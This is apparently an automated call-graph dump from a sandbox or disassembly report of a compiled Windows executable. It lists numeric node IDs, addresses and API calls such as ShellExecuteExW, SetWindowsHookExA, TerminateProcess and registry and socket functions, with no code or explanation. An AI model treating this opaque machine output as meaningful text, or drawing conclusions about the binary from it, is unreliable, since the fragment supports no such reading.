84661->84662 84663 46f662 84662->84663 84664 4536f7 53 API calls 84663->84664 84666 46f689 84664->84666 84665 46f6d1 84668 4533eb 85 API calls 84665->84668 84666->84665 85764 436299 52 API calls 2 library calls 84666->85764 84669 46f6f2 84668->84669 85742 46c366 84669->85742 84671 46f6f9 84672 46f727 84671->84672 84673 46f6fd 84671->84673 85751 4646e0 84672->85751 84674 408f40 VariantClear 84673->84674 84682 46f705 84674->84682 84682->84289 85771 475077 84691->85771 84693 4755c0 84693->84289 84737 408e80 VariantClear 84694->84737 84696 471f70 84697 471f76 84696->84697 84698 471f95 84696->84698 84738 4533eb 84697->84738 84700 402160 52 API calls 84698->84700 84702 471fa5 84700->84702 84701 471f82 84703 40e0a0 52 API calls 84701->84703 84702->84319 84704 471f8e 84703->84704 84704->84319 84706 46f3d5 84705->84706 84707 46f3e6 84706->84707 84712 46f427 84706->84712 84794 44b3ac 57 API calls 84707->84794 84709 46f3eb IsWindow 84710 46f41e 84709->84710 84711 46f3fb 84709->84711 84710->84321 84795 44cdaf 84711->84795 84712->84710 84714 4533eb 85 API calls 84712->84714 84716 46f459 84714->84716 84743 46ed8e 84716->84743 84719 46f412 84719->84321 84722 402160 52 API calls 84721->84722 84723 461395 84722->84723 84811 436458 84723->84811 84726 4613a2 SendMessageW 84728 4613b8 84726->84728 84727 461405 ctype 84727->84329 84729 4115d7 52 API calls 84728->84729 84730 4613d8 SendMessageW 84729->84730 84736->84331 84737->84696 84739 453404 84738->84739 84740 4533f8 84738->84740 84739->84701 84740->84739 84742 4531b1 85 API calls 5 library calls 84740->84742 84742->84739 84744 46eda2 84743->84744 84745 40e0a0 52 API calls 84744->84745 84746 46edd0 84745->84746 84747 40e0a0 52 API calls 84746->84747 84748 46ede0 84747->84748 84749 402160 52 API calls 84748->84749 84750 46edf4 84749->84750 84751 40bc70 52 API calls 84750->84751 84752 46ee22 84751->84752 84753 40bc70 52 API calls 84752->84753 84754 46ee2b 84753->84754 84755 40bc70 52 API calls 84754->84755 84794->84709 84796 44cdbc 84795->84796 84797 4115d7 52 API calls 84796->84797 84798 44cdc9 84797->84798 84799 436299 52 API calls 2 library calls 84798->84799 84799->84719 84814 436327 SendMessageTimeoutW 84811->84814 84813 436466 84813->84726 84813->84727 84814->84813 84816 401b10 52 API calls 84815->84816 84817 44ad92 84816->84817 84818 401b10 52 API calls 84817->84818 84819 44ad9d 84818->84819 84821 408f40 VariantClear 84820->84821 84822 40e71b 84821->84822 84823 4115d7 52 API calls 84822->84823 84824 40e729 84823->84824 84825 40e734 84824->84825 84826 426bdc 84824->84826 84827 426be7 84825->84827 84828 401b10 52 API calls 84825->84828 84826->84827 84829 40bc70 52 API calls 84826->84829 84830 40e743 84828->84830 84829->84827 84830->84376 84830->84377 84843 4339b6 GetFileAttributesW 84831->84843 84833 433a06 84833->84384 84833->84387 84834->84407 84835->84407 84836->84407 84837->84401 84838->84396 84839->84397 84840->84405 84841->84405 84842->84405 84844 4339d2 FindFirstFileW 84843->84844 84845 4339f5 84843->84845 84846 4339e3 84844->84846 84847 4339ea FindClose 84844->84847 84845->84833 84846->84833 84847->84845 84848->84428 84849->84430 84850->84432 84851->84420 84853 402160 52 API calls 84852->84853 84854 463993 84853->84854 84855 402160 52 API calls 84854->84855 84856 46399b 84855->84856 84857 402160 52 API calls 84856->84857 84858 4639a3 84857->84858 84859 463a09 84858->84859 84860 401c90 52 API calls 84858->84860 84861 402160 52 API calls 84859->84861 84862 4639b3 84860->84862 84864 463a07 84861->84864 84862->84859 84863 401c90 52 API calls 84862->84863 84865 4639c3 84863->84865 84886 461465 84864->84886 84865->84859 84866 4639c9 84865->84866 84868 40c600 52 API calls 84866->84868 84872 4639d4 84868->84872 84887 4614cf 84886->84887 84888 461478 84886->84888 84889 40c600 52 API calls 84887->84889 84888->84887 84891 461482 84888->84891 84916 45a52f 54 API calls 84908->84916 84910 465246 inet_addr 84911 465259 84910->84911 84912 4652a8 htons 84911->84912 84913 465273 84911->84913 84912->84518 84913->84518 84915 403c9e 84914->84915 84915->84530 84916->84910 84918 40bc70 52 API calls 84917->84918 84920 457c64 setSBCS 84918->84920 84919 457cac 84921 457cc7 84919->84921 84923 45340c 85 API calls 84919->84923 84920->84919 84922 45340c 85 API calls 84920->84922 84926 45340c 85 API calls 84921->84926 84929 457d01 setSBCS 84921->84929 84924 457c94 84922->84924 84925 457cc0 84923->84925 84924->84919 84928 45340c 85 API calls 84924->84928 84927 410160 52 API calls 84925->84927 84934 457cdc 84926->84934 84927->84921 84930 457ca5 84928->84930 84932 45340c 85 API calls 84929->84932 84948 410160 84930->84948 84933 457d51 ShellExecuteExW 84932->84933 84936 457d73 ctype 84933->84936 84934->84929 84935 4533eb 85 API calls 84934->84935 84937 457cf8 84935->84937 84938 457dc7 84936->84938 84939 457d8d 84936->84939 84940 40e0a0 52 API calls 84937->84940 84941 457dcd 84938->84941 84942 408f40 VariantClear 84938->84942 84944 408f40 VariantClear 84939->84944 84940->84929 84941->84540 84943 457df4 84942->84943 84945 457da7 84943->84945 84946 457e08 CloseHandle 84943->84946 84944->84945 84945->84540 84947 457e17 84946->84947 84947->84540 84949 410167 _wcslen 84948->84949 84950 4115d7 52 API calls 84949->84950 84951 41017e _wcscpy 84950->84951 84951->84919 84953 411523 84952->84953 84954 4114ba 84952->84954 84963 4113a8 58 API calls 4 library calls 84953->84963 84959 4114d1 84954->84959 84961 417f77 46 API calls __getptd_noexit 84954->84961 84957 4114c6 84962 417f25 10 API calls strtoxl 84957->84962 84959->84549 84960->84556 84961->84957 84962->84959 84963->84959 84964->84566 84965->84572 84967 4115d7 52 API calls 84966->84967 84968 40d385 84967->84968 84969 4115d7 52 API calls 84968->84969 84970 40d391 84969->84970 84970->84581 84972 45f66d 84971->84972 84973 45f67c 84971->84973 84983 444d96 52 API calls 84972->84983 84975 4115d7 52 API calls 84973->84975 84977 45f683 WideCharToMultiByte 84975->84977 84976 45f676 84976->84584 84984 45412d 52 API calls _memmove 84977->84984 84979 45f6ab ctype 84979->84584 84980->84591 84981->84594 84982->84596 84983->84976 84984->84979 85070 40f6f0 84985->85070 84987 40f77b _strcat ctype 85078 40f850 84987->85078 84992 427c2a 85108 414d04 84992->85108 84994 40f7fc 84994->84992 84996 40f804 84994->84996 85095 414a46 84996->85095 85064->84622 85065->84630 85071 425de2 85070->85071 85072 40f6fc _wcslen 85070->85072 85071->84987 85073 40f710 WideCharToMultiByte 85072->85073 85074 40f756 85073->85074 85075 40f728 85073->85075 85074->84987 85076 4115d7 52 API calls 85075->85076 85077 40f735 WideCharToMultiByte 85076->85077 85077->84987 85081 40f85d setSBCS _strlen 85078->85081 85079 426b3b 85081->85079 85082 40f7ab 85081->85082 85127 414db8 85081->85127 85083 4149c2 85082->85083 85139 414904 85083->85139 85085 40f7e9 85085->84992 85086 40f5c0 85085->85086 85090 40f5cd _strcat __write_nolock _memmove 85086->85090 85087 414d04 __fread_nolock 61 API calls 85087->85090 85088 40f691 __tzset_nolock 85088->84994 85090->85087 85090->85088 85091 425d11 85090->85091 85261 4150d1 85090->85261 85092 4150d1 _fseek 81 API calls 85091->85092 85093 425d33 85092->85093 85431 414c76 85108->85431 85128 414dd6 85127->85128 85129 414deb 85127->85129 85136 417f77 46 API calls __getptd_noexit 85128->85136 85129->85128 85131 414df2 85129->85131 85134 414de6 85131->85134 85138 418f98 77 API calls 5 library calls 85131->85138 85132 414ddb 85137 417f25 10 API calls strtoxl 85132->85137 85134->85081 85136->85132 85137->85134 85138->85134 85142 414910 __read 85139->85142 85140 414923 85195 417f77 46 API calls __getptd_noexit 85140->85195 85142->85140 85144 414951 85142->85144 85143 414928 85196 417f25 10 API calls strtoxl 85143->85196 85158 41d4d1 85144->85158 85155 414933 @_EH4_CallFilterFunc@8 __read 85155->85085 85159 41d4dd __read 85158->85159 85200 4182cb 85159->85200 85161 41d567 85239 416b04 85161->85239 85165 41d5f0 __read 85166 41d57c InitializeCriticalSectionAndSpinCount 85172 41d4eb 85172->85161 85173 41d560 85172->85173 85210 418209 85172->85210 85237 4154b2 47 API calls __lock 85172->85237 85238 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85172->85238 85207 41d5fb 85173->85207 85195->85143 85196->85155 85201 4182e0 85200->85201 85202 4182f3 EnterCriticalSection 85200->85202 85203 418209 __mtinitlocknum 45 API calls 85201->85203 85202->85172 85204 4182e6 85203->85204 85204->85202 85205 411924 __amsg_exit 45 API calls 85204->85205 85206 4182f2 85205->85206 85206->85202 85208 4181f2 _doexit LeaveCriticalSection 85207->85208 85209 41d602 85208->85209 85209->85165 85211 418215 __read 85210->85211 85212 418225 85211->85212 85213 41823d 85211->85213 85214 418901 __FF_MSGBANNER 45 API calls 85212->85214 85215 416b04 __malloc_crt 45 API calls 85213->85215 85221 41824b __read 85213->85221 85216 41822a 85214->85216 85217 418256 85215->85217 85221->85172 85237->85172 85238->85172 85242 416b0d 85239->85242 85240 4135bb _malloc 45 API calls 85240->85242 85241 416b43 85241->85166 85241->85173 85242->85240 85242->85241 85243 416b24 Sleep 85242->85243 85244 416b39 85243->85244 85244->85241 85244->85242 85264 4150dd __read 85261->85264 85262 4150e9 85292 417f77 46 API calls __getptd_noexit 85262->85292 85264->85262 85265 41510f 85264->85265 85274 415471 85265->85274 85432 414c82 __read 85431->85432 85433 414cbb __read 85432->85433 85434 414cc3 85432->85434 85435 414c96 setSBCS 85432->85435 85735 468100 85734->85735 85736 4680fa 85734->85736 85735->84648 85738 467ac4 55 API calls 2 library calls 85736->85738 85738->85735 85740 4026f0 52 API calls 85739->85740 85741 453705 CharLowerBuffW 85740->85741 85741->84661 85766 465124 53 API calls 85742->85766 85744 46c38e 85746 46c420 85744->85746 85767 40d7c0 52 API calls 2 library calls 85744->85767 85746->84671 85747 40bc70 52 API calls 85748 46c3aa 85747->85748 85748->85746 85748->85747 85749 40e0a0 52 API calls 85748->85749 85768 40d7c0 52 API calls 2 library calls 85748->85768 85749->85748 85752 4536f7 53 API calls 85751->85752 85753 4646fc 85752->85753 85769 4426cd 59 API calls _wcslen 85753->85769 85755 464711 85764->84665 85766->85744 85767->85748 85768->85748 85769->85755 85772 4533eb 85 API calls 85771->85772 85773 4750b8 85772->85773 85774 4750ee 85773->85774 85775 475129 85773->85775 85777 408f40 VariantClear 85774->85777 85776 4646e0 66 API calls 85775->85776 85778 47515e 85776->85778 85782 4750f5 85777->85782 85779 475162 85778->85779 85817 47518e 85778->85817 85780 408f40 VariantClear 85779->85780 85811 475169 85780->85811 85781 475357 85783 475365 85781->85783 85784 4754ea 85781->85784 85782->84693 85845 44b3ac 57 API calls 85783->85845 85851 464812 92 API calls 85784->85851 85788 4754fc 85789 475374 85788->85789 85791 475508 85788->85791 85824 430d31 85789->85824 85790 4533eb 85 API calls 85790->85817 85792 408f40 VariantClear 85791->85792 85795 47550f 85792->85795 85795->85811 85796 475388 85831 4577e9 85796->85831 85798 47539e 85839 410cfc 85798->85839 85799 475480 85801 408f40 VariantClear 85799->85801 85801->85811 85803 4753d4 85806 40e830 53 API calls 85803->85806 85804 4753b8 85846 45e737 90 API calls 3 library calls 85804->85846 85808 4753e3 85806->85808 85807 4753c5 GetCurrentProcess TerminateProcess 85807->85803 85822 475406 85808->85822 85847 40cf00 53 API calls 85808->85847 85809 4754b5 85810 408f40 VariantClear 85809->85810 85810->85811 85811->84693 85813 475556 85813->85811 85814 4753f8 85817->85781 85817->85790 85817->85799 85817->85809 85817->85817 85843 436299 52 API calls 2 library calls 85817->85843 85844 463ad5 64 API calls __wcsicoll 85817->85844 85822->85813 85823 408f40 VariantClear 85822->85823 85849 40cf00 53 API calls 85822->85849 85850 408e80 VariantClear 85822->85850 85852 44b3ac 57 API calls 85822->85852 85853 46c43e 106 API calls 2 library calls 85822->85853 85823->85822 85825 430db2 85824->85825 85826 430d54 85824->85826 85825->85796 85827 4115d7 52 API calls 85826->85827 85828 430d74 85827->85828 85829 430da9 85828->85829 85830 4115d7 52 API calls 85828->85830 85829->85796 85830->85828 85832 457a84 85831->85832 85838 45780c _strcat _wcslen _wcscpy ctype 85831->85838 85832->85798 85833 443006 57 API calls 85833->85838 85835 4135bb 46 API calls _malloc 85835->85838 85836 45340c 85 API calls 85836->85838 85837 40f6f0 54 API calls 85837->85838 85838->85832 85838->85833 85838->85835 85838->85836 85838->85837 85854 44b3ac 57 API calls 85838->85854 85840 410d11 85839->85840 85841 410da9 SetWindowsHookExA 85840->85841 85842 410d77 85840->85842 85841->85842 85842->85803 85842->85804 85843->85817 85844->85817 85845->85789 85846->85807 85847->85814 85849->85822 85850->85822 85851->85788 85852->85822 85853->85822 85854->85838 85855->84192 85856->84212 85864 433d5f 85857->85864 85859 433fbe CloseHandle 85859->84209 85860 433f30 Process32NextW 85860->85859 85862 433f1f _wcscat 85860->85862 85861 413a0e __wsplitpath 46 API calls 85861->85862 85862->85859 85862->85860 85862->85861 85863 4114ab __wcsicoll 58 API calls 85862->85863 85863->85862 85865 433d8b 85864->85865 85866 433d6e 85864->85866 85872 41319b 85865->85872 85866->85865 85870 433d98 85866->85870 85871 4131fc GetStringTypeW wcstoxq 85866->85871 85870->85862 85871->85866 85875 418f18 85872->85875 85876 418f31 85875->85876 85879 418c71 85876->85879 85891 411321 85879->85891 85881 418c97 85899 417f77 46 API calls __getptd_noexit 85881->85899 85884 418c9c 85900 417f25 10 API calls strtoxl 85884->85900 85887 418cce 85888 418cf2 wcstoxq __aulldvrm 85887->85888 85901 418f43 GetStringTypeW 85887->85901 85890 4131ac 85888->85890 85902 417f77 46 API calls __getptd_noexit 85888->85902 85890->85862 85892 411334 85891->85892 85896 411381 85891->85896 85903 417a69 46 API calls 2 library calls 85892->85903 85894 411339 85895 411361 85894->85895 85904 417803 54 API calls 6 library calls 85894->85904 85895->85896 85905 417082 48 API calls 6 library calls 85895->85905 85896->85881 85896->85887 85899->85884 85900->85890 85901->85887 85902->85890 85903->85894 85904->85895 85905->85896 85906->83991 85907->83991 85908->83991 85909->83991 85910->83991 85911->83974 85912->83974 85913->83990 85914->83973 85915->84014 85916->84014 85917->84014 85918->84012 85919->84014 85920->84014 85921 40ad09 85922 40bc10 53 API calls 85921->85922 85923 40ad1f 85922->85923 85925 40ad40 85923->85925 85928 40c1f0 85923->85928 85962 44b92d VariantClear 85925->85962 85927 42bc5b 85929 40c2c0 52 API calls 85928->85929 85930 40c21f 85929->85930 85931 42965b 85930->85931 85932 40c22a 85930->85932 86022 45e737 90 API calls 3 library calls 85931->86022 85938 40c232 85932->85938 86021 40c4e0 465 API calls 85932->86021 85934 429673 85963 47e250 85934->85963 85936 40c23e 85937 40c256 85936->85937 85939 4296c7 85936->85939 86020 408e80 VariantClear 85937->86020 85938->85934 85938->85936 86024 45e737 90 API calls 3 library calls 85939->86024 85943 42969a 85957 40c27c 85943->85957 86023 45e737 90 API calls 3 library calls 85943->86023 85945 40c25f 85946 429721 85945->85946 85945->85957 86025 457f66 87 API calls __write_nolock 85945->86025 85947 429753 85946->85947 86027 472f47 127 API calls 85946->86027 86029 408e80 VariantClear 85947->86029 85950 429708 85954 45340c 85 API calls 85950->85954 85952 42975f 85955 408f40 VariantClear 85952->85955 85953 429734 85956 45340c 85 API calls 85953->85956 85958 42970e _wcslen 85954->85958 85955->85957 85960 42973d _wcslen 85956->85960 85957->85925 85958->85946 86026 408e80 VariantClear 85958->86026 85960->85947 86028 408e80 VariantClear 85960->86028 85962->85927 85964 40bc70 52 API calls 85963->85964 85965 47e28d 85964->85965 85966 47e2ed 85965->85966 85968 47e2ae 85965->85968 85967 46fe32 VariantClear 85966->85967 85969 47e2f6 85967->85969 86041 408e80 VariantClear 85968->86041 85971 47e305 85969->85971 85972 47e319 85969->85972 85974 402160 52 API calls 85971->85974 85975 40e0a0 52 API calls 85972->85975 85973 47e2ba 85977 408f40 VariantClear 85973->85977 85976 47e315 85974->85976 85975->85976 85979 47e38e 85976->85979 86043 475a67 465 API calls 85976->86043 85978 47e2ca 85977->85978 85980 408f40 VariantClear 85978->85980 86030 47b291 85979->86030 85982 47e2d2 85980->85982 86042 410c60 VariantClear ctype 85982->86042 85983 47e346 85983->85979 85986 47e34a 85983->85986 86044 45e538 90 API calls 3 library calls 85986->86044 85987 47e3b7 85990 47e3bb 85987->85990 86011 47e3ed 85987->86011 85988 47e2da 85991 408f40 VariantClear 85988->85991 85992 40e710 53 API calls 85990->85992 85994 47e2e2 85991->85994 85993 47e3c8 85992->85993 85995 40e710 53 API calls 85993->85995 85994->85943 85998 47e358 85995->85998 85996 47e48e 86003 47e250 465 API calls 85996->86003 85997 408f40 VariantClear 85999 47e368 85997->85999 85998->85997 86001 408f40 VariantClear 85999->86001 86004 47e370 86001->86004 86002 47e481 86005 40e710 53 API calls 86002->86005 86006 47e4ae 86003->86006 86045 410c60 VariantClear ctype 86004->86045 86005->85996 86009 408f40 VariantClear 86006->86009 86008 47e378 86010 408f40 VariantClear 86008->86010 86012 47e4c0 86009->86012 86013 47e380 86010->86013 86011->85996 86011->86011 86046 408e80 VariantClear 86011->86046 86014 408f40 VariantClear 86012->86014 86013->85943 86015 47e4c8 86014->86015 86047 410c60 VariantClear ctype 86015->86047 86017 47e4d0 86018 408f40 VariantClear 86017->86018 86019 47e4d8 86018->86019 86019->85943 86020->85945 86021->85938 86022->85934 86023->85957 86024->85957 86025->85950 86026->85946 86027->85953 86028->85947 86029->85952 86031 47b2e7 86030->86031 86032 47b2a5 86030->86032 86031->85987 86033 40e710 53 API calls 86032->86033 86034 47b2af 86033->86034 86035 47b2b7 86034->86035 86036 47b2cf 86034->86036 86048 47974b 86035->86048 86038 47974b 144 API calls 86036->86038 86040 47b2df 86038->86040 86039 47b2c7 86039->85987 86040->85987 86041->85973 86042->85988 86043->85983 86044->85998 86045->86008 86046->86002 86047->86017 86049 479786 86048->86049 86050 479aed 86048->86050 86049->86050 86053 479798 86049->86053 86112 451b42 61 API calls 86050->86112 86052 479b00 86052->86039 86054 4797a2 86053->86054 86055 4797be 86053->86055 86104 451b42 61 API calls 86054->86104 86056 4797c7 86055->86056 86057 4797e3 86055->86057 86105 451b42 61 API calls 86056->86105 86088 441eba 86057->86088 86061 4797b5 86061->86039 86062 4797da 86062->86039 86063 4797f7 86064 479815 86063->86064 86065 4797fe 86063->86065 86069 47983c 86064->86069 86093 451d2b 86064->86093 86106 451b42 61 API calls 86065->86106 86067 47980c 86067->86039 86073 4798e6 86069->86073 86107 479714 110 API calls 86069->86107 86070 47994b VariantInit 86075 479980 setSBCS 86070->86075 86073->86070 86074 479916 VariantClear 86073->86074 86074->86073 86076 479a2c 86075->86076 86077 479a44 86075->86077 86078 479a0b 86075->86078 86109 451b42 61 API calls 86076->86109 86110 468070 104 API calls ctype 86077->86110 86078->86076 86079 479a12 86078->86079 86108 451b42 61 API calls 86079->86108 86083 479a24 86084 479aca VariantClear 86083->86084 86085 479adb 86084->86085 86085->86039 86086 479a50 86086->86084 86111 468070 104 API calls ctype 86086->86111 86089 441f12 86088->86089 86090 441ecc _wcslen 86088->86090 86089->86063 86090->86089 86091 410160 52 API calls 86090->86091 86092 441ede 86091->86092 86092->86063 86096 451d5e 86093->86096 86094 451f21 86097 451ea0 86094->86097 86099 451fab 86094->86099 86100 451f6d lstrcmpiW 86094->86100 86101 451f7f SysFreeString 86094->86101 86095 451e93 SysFreeString 86095->86097 86096->86094 86096->86095 86096->86097 86098 451d68 86096->86098 86097->86098 86113 44a545 RaiseException 86097->86113 86098->86069 86099->86069 86100->86101 86103 451fc7 SysFreeString 86100->86103 86101->86094 86103->86097 86104->86061 86105->86062 86106->86067 86107->86069 86108->86083 86109->86083 86110->86086 86111->86086 86112->86052 86113->86097 86114 425b2b 86119 40f000 86114->86119 86118 425b3a 86120 4115d7 52 API calls 86119->86120 86121 40f007 86120->86121 86122 4276ea 86121->86122 86128 40f030 86121->86128 86127 41130a 51 API calls __cinit 86127->86118 86129 40f039 86128->86129 86130 40f01a 86128->86130 86158 41130a 51 API calls __cinit 86129->86158 86132 40e500 86130->86132 86133 40bc70 52 API calls 86132->86133 86134 40e515 GetVersionExW 86133->86134 86135 402160 52 API calls 86134->86135 86136 40e557 86135->86136 86159 40e660 86136->86159 86139 40e680 52 API calls 86141 40e566 86139->86141 86142 427674 86141->86142 86164 40ef60 86141->86164 86146 4276c6 GetSystemInfo 86142->86146 86144 40e5e0 86148 4276d5 GetSystemInfo 86144->86148 86168 40efd0 86144->86168 86145 40e5cd GetCurrentProcess 86175 40ef20 LoadLibraryA GetProcAddress 86145->86175 86146->86148 86151 40e629 86172 40ef90 86151->86172 86154 40e641 FreeLibrary 86155 40e644 86154->86155 86156 40e653 FreeLibrary 86155->86156 86157 40e656 86155->86157 86156->86157 86157->86127 86158->86130 86160 40e667 86159->86160 86161 42761d 86160->86161 86162 40c600 52 API calls 86160->86162 86163 40e55c 86162->86163 86163->86139 86165 40e5c8 86164->86165 86166 40ef66 LoadLibraryA 86164->86166 86165->86144 86165->86145 86166->86165 86167 40ef77 GetProcAddress 86166->86167 86167->86165 86169 40e620 86168->86169 86170 40efd6 LoadLibraryA 86168->86170 86169->86146 86169->86151 86170->86169 86171 40efe7 GetProcAddress 86170->86171 86171->86169 86176 40efb0 LoadLibraryA GetProcAddress 86172->86176 86174 40e632 GetNativeSystemInfo 86174->86154 86174->86155 86175->86144 86176->86174 86177 40b2cd 86180 40bf20 86177->86180 86181 40bf39 86180->86181 86182 42bdba 86181->86182 86183 40bf78 86181->86183 86309 45e737 90 API calls 3 library calls 86182->86309 86184 40c2c0 52 API calls 86183->86184 86186 40bfa8 86184->86186 86187 408f40 VariantClear 86186->86187 86193 40bfe8 86186->86193 86189 40bfbb 86187->86189 86188 408f40 VariantClear 86191 42c185 86188->86191 86192 401980 53 API calls 86189->86192 86190 40bff5 86194 42be23 86190->86194 86195 40c00c 86190->86195 86207 42bdcd 86190->86207 86196 408f40 VariantClear 86191->86196 86199 40bfd6 86192->86199 86193->86190 86237 40c1dd 86193->86237 86310 40c4e0 465 API calls 86193->86310 86241 40c07f 86194->86241 86311 45e737 90 API calls 3 library calls 86194->86311 86197 40a780 465 API calls 86195->86197 86198 42c18d 86196->86198 86201 40c022 86197->86201 86322 452670 VariantClear 86198->86322 86206 40c2c0 52 API calls 86199->86206 86201->86207 86304 408e80 VariantClear 86201->86304 86204 40a780 465 API calls 86204->86241 86206->86193 86207->86188 86208 42c196 86208->86208 86210 40c035 86213 40a780 465 API calls 86210->86213 86210->86237 86214 40c06b 86213->86214 86214->86207 86305 408e80 VariantClear 86214->86305 86215 452670 VariantClear 86215->86241 86217 40e710 53 API calls 86217->86241 86218 40cf00 53 API calls 86218->86241 86219 452f05 VariantClear 86219->86241 86221 408e80 VariantClear 86221->86241 86222 40c147 86223 40c151 86222->86223 86253 42c0df 86222->86253 86224 408f40 VariantClear 86223->86224 86226 40c159 86224->86226 86225 408f40 VariantClear 86227 42c0f2 86225->86227 86306 40c670 88 API calls 86226->86306 86318 40ceb0 53 API calls 86227->86318 86230 40c16d 86231 42c111 86230->86231 86307 40c670 88 API calls 86230->86307 86319 467c5c 88 API calls 86231->86319 86235 40c180 86235->86231 86238 40c188 86235->86238 86236 42c134 86236->86237 86320 40ceb0 53 API calls 86236->86320 86321 45e737 90 API calls 3 library calls 86237->86321 86308 40ceb0 53 API calls 86238->86308 86241->86204 86241->86207 86241->86215 86241->86217 86241->86218 86241->86219 86241->86221 86241->86222 86241->86237 86242 42c0bc 86241->86242 86246 408f40 VariantClear 86241->86246 86241->86253 86259 46c84c 86241->86259 86312 45e951 53 API calls 86241->86312 86313 451b42 61 API calls 86241->86313 86314 45e737 90 API calls 3 library calls 86241->86314 86315 408e80 VariantClear 86242->86315 86244 42c0c5 86316 408e80 VariantClear 86244->86316 86246->86241 86247 40c199 86249 408f40 VariantClear 86247->86249 86248 42c0d1 86317 40ceb0 53 API calls 86248->86317 86251 40c1af 86249->86251 86252 408f40 VariantClear 86251->86252 86254 40c1b7 86252->86254 86253->86225 86255 408f40 VariantClear 86254->86255 86256 40c1bf 86255->86256 86257 408f40 VariantClear 86256->86257 86258 40b2d8 86257->86258 86263 46c8a3 setSBCS 86259->86263 86260 46ca96 86332 451b42 61 API calls 86260->86332 86262 46cb56 86262->86241 86263->86260 86264 46ca74 86263->86264 86269 46c8e1 86263->86269 86303 46ca4a 86263->86303 86329 451b42 61 API calls 86264->86329 86265 46ca90 86265->86260 86270 46caa2 VariantInit VariantClear 86265->86270 86266 46ca58 86328 451b42 61 API calls 86266->86328 86273 46c904 86269->86273 86274 46c8e8 86269->86274 86276 46cacb 86270->86276 86271 46ca6b 86271->86241 86272 46ca87 86272->86241 86284 46c95e VariantInit 86273->86284 86323 451b42 61 API calls 86274->86323 86278 46cafb 86276->86278 86279 46cad6 86276->86279 86277 46c8fb 86277->86241 86280 46cb05 86278->86280 86281 408f40 VariantClear 86278->86281 86282 408f40 VariantClear 86279->86282 86331 468070 104 API calls ctype 86280->86331 86281->86280 86283 46cadb 86282->86283 86330 451b42 61 API calls 86283->86330 86289 46c99c 86284->86289 86287 46cb2e VariantClear 86287->86241 86288 46caf2 86288->86241 86290 46c9ae 86289->86290 86297 46c9e4 86289->86297 86291 46c9d0 86290->86291 86292 46c9b9 86290->86292 86325 451b42 61 API calls 86291->86325 86324 451b42 61 API calls 86292->86324 86295 46c9c7 86295->86241 86296 46c9db 86296->86241 86297->86260 86298 46ca37 86297->86298 86299 46ca1d 86297->86299 86327 468070 104 API calls ctype 86298->86327 86326 451b42 61 API calls 86299->86326 86301 46ca2e 86301->86241 86303->86265 86303->86266 86304->86210 86305->86241 86306->86230 86307->86235 86308->86247 86309->86207 86310->86190 86311->86241 86312->86241 86313->86241 86314->86241 86315->86244 86316->86248 86317->86253 86318->86231 86319->86236 86320->86237 86321->86207 86322->86208 86323->86277 86324->86295 86325->86296 86326->86301 86327->86303 86328->86271 86329->86272 86330->86288 86331->86287 86332->86262 86333 425b6f 86338 40dc90 86333->86338 86337 425b7e 86339 40bc70 52 API calls 86338->86339 86340 40dd03 86339->86340 86347 40f210 86340->86347 86342 426a97 86344 40dd96 86344->86342 86345 40ddb7 86344->86345 86350 40dc00 52 API calls 2 library calls 86344->86350 86346 41130a 51 API calls __cinit 86345->86346 86346->86337 86351 40f250 RegOpenKeyExW 86347->86351 86349 40f230 86349->86344 86350->86344 86352 425e17 86351->86352 86353 40f275 RegQueryValueExW 86351->86353 86352->86349 86354 40f2c3 RegCloseKey 86353->86354 86355 40f298 86353->86355 86354->86349 86356 40f2a9 RegCloseKey 86355->86356 86357 425e1d 86355->86357 86356->86349 86358 42b1d2 86359 40bc10 53 API calls 86358->86359 86360 42b1e0 86359->86360 86367 4720db 86360->86367 86362 42b228 86454 45e737 90 API calls 3 library calls 86362->86454 86364 42bb6a 86455 44b92d VariantClear 86364->86455 86366 42bc5b 86368 472108 setSBCS 86367->86368 86369 4721d1 86368->86369 86370 47215e 86368->86370 86372 47226d 86369->86372 86374 472545 SHGetFolderPathW 86369->86374 86375 472324 86369->86375 86376 4724a1 86369->86376 86377 4723ae 86369->86377 86378 4725ad SHGetFolderPathW 86369->86378 86379 47252b SHGetFolderPathW 86369->86379 86380 472369 86369->86380 86381 4724f7 SHGetFolderPathW 86369->86381 86382 472255 86369->86382 86383 472274 86369->86383 86384 4723f3 86369->86384 86385 472593 SHGetFolderPathW 86369->86385 86386 472511 SHGetFolderPathW 86369->86386 86387 4722df 86369->86387 86388 47255f SHGetFolderPathW 86369->86388 86389 47229e GetLocalTime 86369->86389 86390 47247d 86369->86390 86391 4724dd SHGetFolderPathW 86369->86391 86392 472579 SHGetFolderPathW 86369->86392 86393 472438 86369->86393 86371 401b10 52 API calls 86370->86371 86373 47216b 86371->86373 86372->86362 86456 40bd50 52 API calls 86373->86456 86396 4722be 86374->86396 86463 441e23 GetSystemTimeAsFileTime 86375->86463 86480 441e23 GetSystemTimeAsFileTime 86376->86480 86469 441e23 GetSystemTimeAsFileTime 86377->86469 86378->86396 86379->86396 86466 441e23 GetSystemTimeAsFileTime 86380->86466 86381->86396 86415 408f40 VariantClear 86382->86415 86458 408e80 VariantClear 86383->86458 86472 441e23 GetSystemTimeAsFileTime 86384->86472 86385->86396 86386->86396 86460 441e23 GetSystemTimeAsFileTime 86387->86460 86388->86396 86398 4722b9 86389->86398 86478 441e23 GetSystemTimeAsFileTime 86390->86478 86391->86396 86392->86396 86475 441e23 GetSystemTimeAsFileTime 86393->86475 86422 40e710 53 API calls 86396->86422 86459 41329b 79 API calls 4 library calls 86398->86459 86405 47233c 86464 451aa8 91 API calls _strftime 86405->86464 86406 47240b 86473 451aa8 91 API calls _strftime 86406->86473 86407 472381 86467 451aa8 91 API calls _strftime 86407->86467 86409 47217d 86420 40c2c0 52 API calls 86409->86420 86410 472450 86476 451aa8 91 API calls _strftime 86410->86476 86411 4722f7 86461 451aa8 91 API calls _strftime 86411->86461 86412 4723c6 86470 451aa8 91 API calls _strftime 86412->86470 86413 472489 86479 451b19 83 API calls 86413->86479 86414 4724b3 86481 451aa8 91 API calls _strftime 86414->86481 86415->86372 86432 47218c 86420->86432 86434 4722cc 86422->86434 86427 4724b9 86482 40e6a0 53 API calls 86427->86482 86428 472342 86465 40e6a0 53 API calls 86428->86465 86429 472411 86474 40e6a0 53 API calls 86429->86474 86430 47228b 86430->86362 86431 472387 86468 40e6a0 53 API calls 86431->86468 86453 472193 86432->86453 86457 408e80 VariantClear 86432->86457 86433 472456 86477 40e6a0 53 API calls 86433->86477 86434->86362 86435 4722fd 86462 40e6a0 53 API calls 86435->86462 86436 4723cc 86471 40e6a0 53 API calls 86436->86471 86444 4724c2 86444->86362 86445 47234b 86445->86362 86446 47241a 